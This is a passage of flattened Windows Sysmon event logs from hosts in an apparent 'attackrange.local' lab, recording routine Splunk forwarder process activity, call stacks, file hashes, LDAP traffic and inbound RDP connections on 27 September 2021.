Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048974Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048973Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048972Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048971Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048970Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8972-6151-0B7A-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048969Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.031{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8972-6151-0B7A-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048968Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.026{5EBD8912-8972-6151-0B7A-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:55.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F857F7610EBDC59195EEAF8580FCABE8,SHA256=2F3BDB3FA8402D1CD31F6475F6B9ACEAF45D23B08D5ABF5CDCC480F85833F47A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:55.826{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69BC93D65D707D924FC4CB8C8A970C50,SHA256=0261E55DA83C8996115A7F6ABFFF757AAF3D96040E92C52370BD0705A2C6B6AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:54.484{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local389-false10.0.1.15-64586- 10341000x80000000000000001048999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.582{5EBD8912-8973-6151-0D7A-00000000FC01}60046024C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8973-6151-0D7A-00000000FC01}6004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8973-6151-0D7A-00000000FC01}6004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.413{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8973-6151-0D7A-00000000FC01}6004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.398{5EBD8912-8973-6151-0D7A-00000000FC01}6004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.351{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88706E549895395D5B5C432E23A0F8D6,SHA256=D02C0F15F2F7A3C4A8CB8F6545B17C768D7C33F72E319819929A9BFB9220B39F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:52.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59311-false10.0.1.12-8000- 354300x8000000000000000977595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:52.656{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-21697-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:51.712{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57188-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:55.531{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4303MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:55.051{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B9DD017BCB667C07810F5EE6C029C79,SHA256=FEC97E1D0F5FF570FE57D0D1E6560B792E6CA5EA983C40CE60484817A53C6F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:56.828{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C32610CE1A8B47CBB782FDD2274C0975,SHA256=8042B1ACE6FF5C8544C58AD0B4471FC78E369C43E683EF1A754025D74D0C635B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049010Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.399{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD43ED0A8E41C5EDD1BFBDC5897BA5E1,SHA256=5265F03B75D52EA7960D82C380F3CFE6BBA260B9ABFA4EC6A570AAA73D2825C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.367{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CAC23C88715B3BB676D18A182F945DD,SHA256=F777110D6EE5E2858D7AF6E6AB81362931776414F1CD88C0E70C16EECCEB5BA8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.136{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8974-6151-0E7A-00000000FC01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049006Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049005Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.131{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049004Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.131{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049003Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:56.131{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8974-6151-0E7A-00000000FC01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 